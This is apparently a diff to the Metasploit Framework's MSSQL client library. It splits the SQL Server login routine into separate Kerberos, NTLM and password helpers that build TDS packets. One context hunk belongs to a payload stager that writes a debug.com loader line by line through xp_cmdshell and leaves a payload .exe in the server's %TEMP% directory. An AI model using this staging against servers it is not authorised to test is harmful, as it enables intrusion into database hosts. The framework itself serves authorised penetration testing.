@@ -36,7 +36,6 @@ module Rex
         attr_accessor :use_lmkey
         attr_accessor :use_ntlm2_session
         attr_accessor :use_ntlmv2
-        attr_accessor :windows_authentication
         attr_reader :framework_module
         attr_reader :framework
         # @!attribute max_send_size
@@ -63,16 +62,17 @@ module Rex
           @auth                   = framework_module.datastore['Mssql::Auth']         || Msf::Exploit::Remote::AuthOption::AUTO
           @hostname               = framework_module.datastore['Mssql::Rhostname']    || ''
 
-          @windows_authentication = framework_module.datastore['USE_WINDOWS_AUTHENT'] || false
           @tdsencryption          = framework_module.datastore['TDSENCRYPTION']       || false
           @hex2binary             = framework_module.datastore['HEX2BINARY']          || ''
 
+
           @domain_controller_rhost = framework_module.datastore['DomainControllerRhost'] || ''
           @rhost = rhost
           @rport = rport
           @proxies = proxies
           @sslkeylogfile = sslkeylogfile
           @current_database = ''
+          @initial_connection_info = {errors: []}
         end
 
         # MS SQL Server only supports Windows and Linux
@@ -135,347 +135,20 @@ module Rex
         #
 
         def mssql_login(user='sa', pass='', db='', domain_name='')
-          prelogin_data = mssql_prelogin
-          if auth == Msf::Exploit::Remote::AuthOption::KERBEROS
-            idx = 0
-            pkt = ''
-            pkt_hdr = ''
-            pkt_hdr =  [
-              TYPE_TDS7_LOGIN, #type
-              STATUS_END_OF_MESSAGE, #status
-              0x0000, #length
-              0x0000, # SPID
-              0x01,   # PacketID (unused upon specification
-              # but ms network monitor still prefer 1 to decode correctly, wireshark don't care)
-              0x00   #Window
-            ]
-
-            pkt << [
-              0x00000000,   # Size
-              0x71000001,   # TDS Version
-              0x00000000,   # Dummy Size
-              0x00000007,   # Version
-              rand(1024+1), # PID
-              0x00000000,   # ConnectionID
-              0xe0,         # Option Flags 1
-              0x83,         # Option Flags 2
-              0x00,         # SQL Type Flags
-              0x00,         # Reserved Flags
-              0x00000000,   # Time Zone
-              0x00000000    # Collation
-            ].pack('VVVVVVCCCCVV')
-
-            cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
-            aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
-            sname = Rex::Text.to_unicode( rhost )
-            framework_module.fail_with(Msf::Exploit::Failure::BadConfig, 'The Mssql::Rhostname option is required when using kerberos authentication.') if @hostname.blank?
-            kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
-              host: @domain_controller_rhost,
-              hostname: @hostname,
-              mssql_port: rport,
-              proxies: proxies,
-              realm: domain_name,
-              username: user,
-              password: pass,
-              framework: framework,
-              framework_module: framework_module,
-              ticket_storage: Msf::Exploit::Remote::Kerberos::Ticket::Storage::WriteOnly.new(framework: framework, framework_module: framework_module)
-            )
-
-            kerberos_result = kerberos_authenticator.authenticate
-            ssp_security_blob = kerberos_result[:security_blob]
-
-            idx = pkt.size + 50 # lengths below
-
-            pkt << [idx, cname.length / 2].pack('vv')
-            idx += cname.length
-
-            pkt << [0, 0].pack('vv') # User length offset must be 0
-            pkt << [0, 0].pack('vv') # Password length offset must be 0
-
-            pkt << [idx, aname.length / 2].pack('vv')
-            idx += aname.length
-
-            pkt << [idx, sname.length / 2].pack('vv')
-            idx += sname.length
-
-            pkt << [0, 0].pack('vv') # unused
-
-            pkt << [idx, aname.length / 2].pack('vv')
-            idx += aname.length
-
-            pkt << [idx, 0].pack('vv') # locales
-
-            pkt << [idx, 0].pack('vv') #db
-
-            # ClientID (should be mac address)
-            pkt << Rex::Text.rand_text(6)
-
-            # SSP
-            pkt << [idx, ssp_security_blob.length].pack('vv')
-            idx += ssp_security_blob.length
-
-            pkt << [idx, 0].pack('vv') # AtchDBFile
-
-            pkt << cname
-            pkt << aname
-            pkt << sname
-            pkt << aname
-            pkt << ssp_security_blob
-
-            # Total packet length
-            pkt[0, 4] = [pkt.length].pack('V')
-
-            pkt_hdr[2] = pkt.length + 8
-
-            pkt = pkt_hdr.pack("CCnnCC") + pkt
-
-            # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
-            # has a strange behavior that differs from the specifications
-            # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
-            # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
-            resp = mssql_send_recv(pkt, 15, false)
-
-            info = {:errors => []}
-            info = mssql_parse_reply(resp, info)
-            self.initial_connection_info = info
-            self.initial_connection_info[:prelogin_data] = prelogin_data
-
-            return false if not info
-            return info[:login_ack] ? true : false
-          elsif auth == Msf::Exploit::Remote::AuthOption::NTLM || windows_authentication
-            idx = 0
-            pkt = ''
-            pkt_hdr = ''
-            pkt_hdr =  [
-                TYPE_TDS7_LOGIN, #type
-                STATUS_END_OF_MESSAGE, #status
-                0x0000, #length
-                0x0000, # SPID
-                0x01,   # PacketID (unused upon specification
-                # but ms network monitor still prefer 1 to decode correctly, wireshark don't care)
-                0x00   #Window
-            ]
-
-            pkt << [
-                0x00000000,   # Size
-                0x71000001,   # TDS Version
-                0x00000000,   # Dummy Size
-                0x00000007,   # Version
-                rand(1024+1), # PID
-                0x00000000,   # ConnectionID
-                0xe0,         # Option Flags 1
-                0x83,         # Option Flags 2
-                0x00,         # SQL Type Flags
-                0x00,         # Reserved Flags
-                0x00000000,   # Time Zone
-                0x00000000    # Collation
-            ].pack('VVVVVVCCCCVV')
-
-            cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
-            aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) ) #application and library name
-            sname = Rex::Text.to_unicode( rhost )
-            dname = Rex::Text.to_unicode( db )
-
-            workstation_name = Rex::Text.rand_text_alpha(rand(8)+1)
-
-            ntlm_client = ::Net::NTLM::Client.new(
-              user,
-              pass,
-              workstation: workstation_name,
-              domain: domain_name,
-            )
-            type1 = ntlm_client.init_context
-            # SQL 2012, at least, does not support KEY_EXCHANGE
-            type1.flag &= ~ ::Net::NTLM::FLAGS[:KEY_EXCHANGE]
-            ntlmsspblob = type1.serialize
-
-            idx = pkt.size + 50 # lengths below
-
-            pkt << [idx, cname.length / 2].pack('vv')
-            idx += cname.length
-
-            pkt << [0, 0].pack('vv') # User length offset must be 0
-            pkt << [0, 0].pack('vv') # Password length offset must be 0
-
-            pkt << [idx, aname.length / 2].pack('vv')
-            idx += aname.length
-
-            pkt << [idx, sname.length / 2].pack('vv')
-            idx += sname.length
-
-            pkt << [0, 0].pack('vv') # unused
-
-            pkt << [idx, aname.length / 2].pack('vv')
-            idx += aname.length
-
-            pkt << [idx, 0].pack('vv') # locales
-
-            pkt << [idx, 0].pack('vv') #db
-
-            # ClientID (should be mac address)
-            pkt << Rex::Text.rand_text(6)
-
-            # NTLMSSP
-            pkt << [idx, ntlmsspblob.length].pack('vv')
-            idx += ntlmsspblob.length
-
-            pkt << [idx, 0].pack('vv') # AtchDBFile
-
-            pkt << cname
-            pkt << aname
-            pkt << sname
-            pkt << aname
-            pkt << ntlmsspblob
-
-            # Total packet length
-            pkt[0, 4] = [pkt.length].pack('V')
-
-            pkt_hdr[2] = pkt.length + 8
-
-            pkt = pkt_hdr.pack("CCnnCC") + pkt
-
-            # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
-            # has a strange behavior that differs from the specifications
-            # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
-            # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
-            if tdsencryption == true
-               proxy = TDSSSLProxy.new(sock, sslkeylogfile: sslkeylogfile)
-               proxy.setup_ssl
-               resp = proxy.send_recv(pkt)
+          case auth
+          when Msf::Exploit::Remote::AuthOption::AUTO
+            if domain_name.blank?
+              login_sql(user, pass, db, domain_name)
             else
-               resp = mssql_send_recv(pkt, 15, false)
+              login_ntlm(user, pass, db, domain_name)
             end
-
-            # Strip the TDS header
-            resp = resp[3..-1]
-            type3 = ntlm_client.init_context([resp].pack('m'))
-            type3_blob = type3.serialize
-
-            # Create an SSPIMessage
-            idx = 0
-            pkt = ''
-            pkt_hdr = ''
-            pkt_hdr = [
-              TYPE_SSPI_MESSAGE, #type
-              STATUS_END_OF_MESSAGE, #status
-              0x0000, #length
-              0x0000, # SPID
-              0x01, # PacketID
-              0x00 #Window
-            ]
-
-            pkt_hdr[2] = type3_blob.length + 8
-
-            pkt = pkt_hdr.pack("CCnnCC") + type3_blob
-
-            if self.tdsencryption == true
-              resp = mssql_ssl_send_recv(pkt, proxy)
-              proxy.cleanup
-              proxy = nil
-            else
-              resp = mssql_send_recv(pkt)
-            end
-
-            #SQL Server Authentication
-          else
-            idx = 0
-            pkt = ''
-            pkt << [
-                0x00000000,   # Dummy size
-
-                0x71000001,   # TDS Version
-                0x00000000,   # Size
-                0x00000007,   # Version
-                rand(1024+1), # PID
-                0x00000000,   # ConnectionID
-                0xe0,         # Option Flags 1
-                0x03,         # Option Flags 2
-                0x00,         # SQL Type Flags
-                0x00,         # Reserved Flags
-                0x00000000,   # Time Zone
-                0x00000000    # Collation
-            ].pack('VVVVVVCCCCVV')
-
-
-            cname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
-            uname = Rex::Text.to_unicode( user )
-            pname = mssql_tds_encrypt( pass )
-            aname = Rex::Text.to_unicode( Rex::Text.rand_text_alpha(rand(8)+1) )
-            sname = Rex::Text.to_unicode( rhost )
-            dname = Rex::Text.to_unicode( db )
-
-            idx = pkt.size + 50 # lengths below
-
-            pkt << [idx, cname.length / 2].pack('vv')
-            idx += cname.length
-
-            pkt << [idx, uname.length / 2].pack('vv')
-            idx += uname.length
-
-            pkt << [idx, pname.length / 2].pack('vv')
-            idx += pname.length
-
-            pkt << [idx, aname.length / 2].pack('vv')
-            idx += aname.length
-
-            pkt << [idx, sname.length / 2].pack('vv')
-            idx += sname.length
-
-            pkt << [0, 0].pack('vv')
-
-            pkt << [idx, aname.length / 2].pack('vv')
-            idx += aname.length
-
-            pkt << [idx, 0].pack('vv')
-
-            pkt << [idx, dname.length / 2].pack('vv')
-            idx += dname.length
-
-            # The total length has to be embedded twice more here
-            pkt << [
-                0,
-                0,
-                0x12345678,
-                0x12345678
-            ].pack('vVVV')
-
-            pkt << cname
-            pkt << uname
-            pkt << pname
-            pkt << aname
-            pkt << sname
-            pkt << aname
-            pkt << dname
-
-            # Total packet length
-            pkt[0, 4] = [pkt.length].pack('V')
-
-            # Embedded packet lengths
-            pkt[pkt.index([0x12345678].pack('V')), 8] = [pkt.length].pack('V') * 2
-
-            # Packet header and total length including header
-            pkt = "\x10\x01" + [pkt.length + 8].pack('n') + [0].pack('n') + [1].pack('C') + "\x00" + pkt
-
-            if self.tdsencryption == true
-              proxy = TDSSSLProxy.new(sock, sslkeylogfile: sslkeylogfile)
-              proxy.setup_ssl
-              resp = mssql_ssl_send_recv(pkt, proxy)
-              proxy.cleanup
-              proxy = nil
-            else
-              resp = mssql_send_recv(pkt)
-            end
-
+          when Msf::Exploit::Remote::AuthOption::KERBEROS
+            login_kerberos(user, pass, db, domain_name)
+          when Msf::Exploit::Remote::AuthOption::NTLM
+            login_ntlm(user, pass, db, domain_name)
+          when Msf::Exploit::Remote::AuthOption::PLAINTEXT
+            login_sql(user, pass, db, domain_name)
           end
-
-          info = {:errors => []}
-          info = mssql_parse_reply(resp, info)
-          self.initial_connection_info = info
-          self.initial_connection_info[:prelogin_data] = prelogin_data
-
-          return false if not info
-          info[:login_ack] ? true : false
         end
 
         #
@@ -577,8 +250,8 @@ module Rex
           print_status("Warning: This module will leave #{var_payload}.exe in the SQL Server %TEMP% directory")
           print_status("Writing the debug.com loader to the disk...")
           h2b = File.read(@hex2binary, File.size(@hex2binary))
-          h2b.gsub!(/KemneE3N/, "%TEMP%\\#{var_bypass}")
-          h2b.split(/\n/).each do |line|
+          h2b.gsub!('KemneE3N', "%TEMP%\\#{var_bypass}")
+          h2b.split("\n").each do |line|
             mssql_xpcmdshell("#{line}", false)
           end
 
@@ -650,7 +323,7 @@ module Rex
         end
 
         def peerinfo
-          "#{peerhost}:#{peerport}"
+          Rex::Socket.to_authority(peerhost, peerport)
         end
 
         protected
@@ -670,6 +343,170 @@ module Rex
         def cport
           return nil
         end
+
+        private
+
+        def login_kerberos(user, pass, db, domain_name)
+          prelogin_data = mssql_prelogin
+
+          framework_module.fail_with(Msf::Exploit::Failure::BadConfig, 'The Mssql::Rhostname option is required when using kerberos authentication.') if @hostname.blank?
+          kerberos_authenticator = Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::MSSQL.new(
+            host: @domain_controller_rhost,
+            hostname: @hostname,
+            mssql_port: rport,
+            proxies: proxies,
+            realm: domain_name,
+            username: user,
+            password: pass,
+            framework: framework,
+            framework_module: framework_module,
+            ticket_storage: Msf::Exploit::Remote::Kerberos::Ticket::Storage::WriteOnly.new(framework: framework, framework_module: framework_module)
+          )
+
+          kerberos_result = kerberos_authenticator.authenticate
+
+          pkt_hdr = MsTdsHeader.new(
+            packet_type: MsTdsType::TDS7_LOGIN,
+            packet_id: 1
+          )
+
+          pkt_body = MsTdsLogin7.new(
+            option_flags_2: {
+              f_int_security: 1
+            },
+            server_name: rhost,
+            database: db
+          )
+
+          pkt_body.sspi = kerberos_result[:security_blob].bytes
+
+          pkt_hdr.packet_length += pkt_body.num_bytes
+          pkt = pkt_hdr.to_binary_s + pkt_body.to_binary_s
+
+          # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
+          # has a strange behavior that differs from the specifications
+          # upon receiving the ntlm_negociate request it send an ntlm_challenge but the status flag of the tds packet header
+          # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
+          resp = mssql_send_recv(pkt, 15, false)
+
+          info = {:errors => []}
+          info = mssql_parse_reply(resp, info)
+          self.initial_connection_info = info
+          self.initial_connection_info[:prelogin_data] = prelogin_data
+
+          return false if not info
+
+          info[:login_ack] ? true : false
+        end
+
+        def login_ntlm(user, pass, db, domain_name)
+          prelogin_data = mssql_prelogin
+
+          pkt_hdr = MsTdsHeader.new(
+            packet_type: MsTdsType::TDS7_LOGIN,
+            packet_id: 1
+          )
+
+          pkt_body = MsTdsLogin7.new(
+            option_flags_2: {
+              f_int_security: 1
+            },
+            server_name: rhost,
+            database: db
+          )
+
+          ntlm_client = ::Net::NTLM::Client.new(
+            user,
+            pass,
+            workstation: Rex::Text.rand_text_alpha(rand(1..8)),
+            domain: domain_name,
+          )
+          type1 = ntlm_client.init_context
+          # SQL 2012, at least, does not support KEY_EXCHANGE
+          type1.flag &= ~ ::Net::NTLM::FLAGS[:KEY_EXCHANGE]
+
+          pkt_body.sspi = type1.serialize.bytes
+
+          pkt_hdr.packet_length += pkt_body.num_bytes
+          pkt = pkt_hdr.to_binary_s + pkt_body.to_binary_s
+
+          # Rem : One have to set check_status to false here because sql server sp0 (and maybe above)
+          # has a strange behavior that differs from the specifications
+          # upon receiving the ntlm_negotiate request it send an ntlm_challenge but the status flag of the tds packet header
+          # is set to STATUS_NORMAL and not STATUS_END_OF_MESSAGE, then internally it waits for the ntlm_authentification
+          if tdsencryption == true
+            proxy = TDSSSLProxy.new(sock, sslkeylogfile: sslkeylogfile)
+            proxy.setup_ssl
+            resp = proxy.send_recv(pkt)
+          else
+            resp = mssql_send_recv(pkt, 15, false)
+          end
+
+          # Strip the TDS header
+          resp = resp[3..-1]
+          type3 = ntlm_client.init_context([resp].pack('m'))
+          type3_blob = type3.serialize
+
+          # Create an SSPIMessage
+          pkt_hdr = MsTdsHeader.new(
+            type: MsTdsType::SSPI_MESSAGE,
+            packet_id: 1
+          )
+
+          pkt_hdr.packet_length += type3_blob.length
+          pkt = pkt_hdr.to_binary_s + type3_blob
+
+          if self.tdsencryption == true
+            resp = mssql_ssl_send_recv(pkt, proxy)
+            proxy.cleanup
+          else
+            resp = mssql_send_recv(pkt)
+          end
+
+          info = {:errors => []}
+          info = mssql_parse_reply(resp, info)
+          self.initial_connection_info = info
+          self.initial_connection_info[:prelogin_data] = prelogin_data
+
+          return false if not info
+          info[:login_ack] ? true : false
+        end
+
+        def login_sql(user, pass, db, _domain_name)
+          prelogin_data = mssql_prelogin
+
+          pkt_hdr = MsTdsHeader.new(
+            packet_type: MsTdsType::TDS7_LOGIN,
+            packet_id: 1
+          )
+
+          pkt_body = MsTdsLogin7.new(
+            server_name: rhost,
+            database: db,
+            username: user,
+            password: pass
+          )
+
+          pkt_hdr.packet_length += pkt_body.num_bytes
+          pkt = pkt_hdr.to_binary_s + pkt_body.to_binary_s
+
+          if self.tdsencryption == true
+            proxy = TDSSSLProxy.new(sock, sslkeylogfile: sslkeylogfile)
+            proxy.setup_ssl
+            resp = mssql_ssl_send_recv(pkt, proxy)
+            proxy.cleanup
+          else
+            resp = mssql_send_recv(pkt)
+          end
+
+          info = {:errors => []}
+          info = mssql_parse_reply(resp, info)
+          self.initial_connection_info = info
+          self.initial_connection_info[:prelogin_data] = prelogin_data
+
+          return false if not info
+          info[:login_ack] ? true : false
+        end
       end
 
     end
